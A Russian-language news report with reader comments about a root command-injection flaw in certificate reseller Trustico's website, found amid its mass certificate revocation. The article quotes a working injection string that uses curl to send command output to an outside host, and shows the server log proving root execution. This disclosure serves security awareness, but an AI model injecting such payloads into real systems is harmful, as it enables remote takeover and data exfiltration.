Вчерашняя история (https://www.opennet.dev/opennews/art.shtml?num=48166) с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из пользователей сервиса обнаружил (https://twitter.com/cujanovic/status/969229397508153350) тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.

Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки  сертификата, то они будут исполнены на сервере с правами root.

Например, при вводе "$(curl http://1.2.3.4/`id`)" на указанный хост придёт запрос вида:

   1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

В настоящее время сайт Trustico (https://trustico.com) выведен из строя и недоступен. Представители удостоверяющего центра DigiCert и других партнёров Trustico пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва все выданных через Trustico сертификатов в течение 24 часов.

URL: https://www.reddit.com/r/sysadmin/comments/816t5f/trustico_w.../
Новость: https://www.opennet.dev/opennews/art.shtml?num=48176

• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:18 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,user, 12:27 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:19 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:24 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 12:21 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:22 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 10:15 , 02-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 11:07 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Michael Shigorin, 10:52 , 03-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 13:28 , 03-Мрт-18
      • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Dmitry77, 00:35 , 04-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 13:42 , 03-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,A.Stahl, 09:23 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,commiethebeastie, 09:25 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:26 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,angra, 10:34 , 02-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 18:42 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 11:04 , 02-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 12:32 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 13:05 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:28 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,нах, 09:52 , 02-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,mickvav, 11:18 , 03-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 10:37 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 10:47 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 11:12 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 11:27 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Zlo, 11:40 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 12:47 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 12:57 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 13:44 , 03-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Дуплик, 13:40 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Дудосер, 14:15 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Некто, 14:16 , 02-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,ананас, 14:27 , 02-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Диалектик, 18:58 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 08:11 , 03-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,mumu, 16:54 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Некто, 17:10 , 02-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 19:23 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,кек, 21:31 , 02-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 22:23 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 23:10 , 02-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 00:17 , 03-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Ordu, 08:45 , 03-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 09:36 , 03-Мрт-18
    • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 18:07 , 03-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Тот_Самый_Анонимус, 11:41 , 03-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Kuromi, 17:42 , 03-Мрт-18
  • Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Kuromi, 06:05 , 05-Мрт-18
• Ожидается отзыв всех остальных сертификатов Trustico из-за п...,Аноним, 03:23 , 06-Мрт-18

Что вы делаете, прекратите! Я попкорн уже не успеваю из аргентины подвозить

Из аргентинской муки нужно делать блины на лопате.

"Гори-гори ясно, чтобы не погасло!"

> "Гори-гори ясно, чтобы не погасло!"

Earth, Wind & Fire - Boogie Wonderland
Scooter - Fire

The roof
The roof
The roof is on fire
We don't need no water
Let the motherfucker burn
Burn, motherfucker, burn(C)

урок коррупционерам

я Вас умоляю, просто подкорректируют планы безотносительно к сути происшествия

разумеется, на пути жадности нет преград

> урок коррупционерам

Это Вы про тот почтовый сервер Хиллари?

Всем кто смеет хреново работать и раздолбайствовать.

Ну как сказать.. хреново работает - тот кто принимает стандарты. Например DNS. Сертификаты - это  заплатка которая плохо держится.

Нет, про получателей отката от комода за переход к ним с дигисерта. Такое впечатление, что их в яслях или в школе врать не научили, и они наивно полагали, что просто так можно краденные серты предъявить.

Ну облажались. Бывает. Trustico это маленький посредник. Возможно там в штате 1 человек, он же хозяин-администратор-программист. Совершенно обычная ситуация. Ничего нового.

>http://1.2.3.4/`id`

CVSS 11?

Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные, но так как хорошие разработчики это ленивые, нетерпеливые, с завышенным самомнением, персонажи, то остаются только студенты и индусы.

>Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные

А деньги есть только на студентов и индусов, так как почти все средства уходят на бонусы манагеров.

Так снесите Бастилию )

> внимательные, трудолюбивые и скромные

послушные, согласные, умеющие в минимум полезных действий, внимание и трудолюбие ведут к убыткам

> внимание и трудолюбие ведут к убыткам

В стартапах, да. В энтерпрайзе наоборот.

проблема в тех кто платит, не принёс новую звёздную идею - не достоин хорошего дохода.
как итог постепенно вся кропотливая работа сваливается на наиболее адекватного в условном отделе, а в какой-то момент он либо устаёт, либо просто уходит...

Уволенный из Equifax администратор, перешёл на работу в Trustico?

уволенный поехал обратно в свою деревню под Бангалором, в трех тапках - два на ногах, один в жопе, проблема в том, что их в той деревне пол-миллиона, и треть уехали в Штаты по очень мягким визовым правилам. (вторая треть уехала в Европы с ближними Азиями)
тапок не хватит.

Вы так говорите, как будто чувак из мухосранска не мог админить оносайтик...

> Представители удостоверяющего центра DigiCert и других партнёров Trustico пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва все выданных через Trustico сертификатов в течение 24 часов.

И не отреагируют, сколько мы ни будем ожидать.

При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

И мы конечно верим им на слово, да? Учитывая что во всем остальном они врали как сивый мерин и скрывали информацию до последнего.

> И мы конечно верим им на слово, да?

Я думаю, что эта фраза в конце новости подается просто для особого смака.

в выигрыше остались те, кто доверился малозащищенному реселлеру - все они узнали, что скомпрометированы с приемлимой задержкой в границах TTT(time to trust).

Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач у всех остальных сертификаторов......прям совпадение.....

Не думаю

А сам letsencrypt можно рассматривать как монокультуру...

> Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач
> у всех остальных сертификаторов......прям совпадение.....

Это не совпадение, а следствие: комод теряет доход и пытается подмять остатки бизнеса на платных сертификатах.

Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.

А за щеку откладывать можно будет?

> Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.

Ага! И все браузеры, использующие "HTTPSSS на блокчейне", в свободное время будут майнить не Monero, а подписи к транзакциям в этом блокчейне. Правильно! К чему столько вычислительной мощности CPU простаивает!

Да и ещё выкачивать уже подписанные сертификаты чтобы проверять локально

Зачем самостоятельно что-то майнить? Вон возьми тот же блокчейн namecoin и используй нахаляву.

но ведь namecoin уже есть.

> передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.

#$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной школы имеет под собой серьёзные аргументы.

>> передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.
> #$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной
> школы имеет под собой серьёзные аргументы.

А еще "... они будут исполнены на сервере с правами root", что однозначно указывает, что их веб сервер работал под рутом!

Запрет на пользование интернетом до окончания начальной школы от таких уродов не спасет. Нужна юридическая норма на пожизненный запрет пользования компьютером.

если форенсик сможет с убедительной вероятностью указать на конкретное лицо, с которым не будет некоторого рода проблем. а уж запрет пользования..

>Суть  выявленной уязвимости в передаче пользовательского ввода в обработчик на  shell без экранирования спецсимволов

шел 2018 год...

Где то видел статью о том что дешевле быть взломанным чем тратить деньги на грамотных специалистов. Такова селяви

Дешевле не значит выгоднее.

Еще дешевле вообще не заморачиваться с сайтами, не делать их вообще. Расходов ровно 0. Заодно и не сломают.

Поэтому сейчас в США даже республиканцы задумываются о том, что сфера IT требует большего регулирования со стороны государства. Чтобы быть взломанным было бы дороже.

никто не застрахован от ошибок, можно учиться жить без компьютера, пока регулятор не утянул всех под лёд

непонял, это как: "запретить взламывать" или "запретить быть взламываемыми"?

В общем, сам принцип доверенных сертификатов пошёл по песде. Набуя вообще эти списки доверенных по умолчанию? Пусть каждый сам решает кому доверять, или ставит дополнение, которое решает за него.

А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка - в мае.
Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов на затронутых сайтах, наконец-то.

> А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов
> от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация
> не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка
> - в мае.
> Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов
> на затронутых сайтах, наконец-то.

И, само смешное, спустя пару дней включили назад.

Прекрасно! Находил такие дыры лет 12 назад много где, но не думал, что такое до сих пор встречается в чем-то серьезнее курсовых работ. :)

Самое удивительное, что сэкономили на разработчиках те, у кого вообще затрат на ведение бизнеса почти по нулям - даже не продажа, а перепродажа воздуха. Жадность человеческая не имеет предела.